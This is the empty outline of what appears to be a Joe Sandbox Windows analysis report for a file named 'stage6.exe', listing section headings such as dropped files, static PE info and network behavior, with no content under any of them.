Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Suricata IDS Alerts

Network Port Distribution

Windows Analysis Report
stage6.exe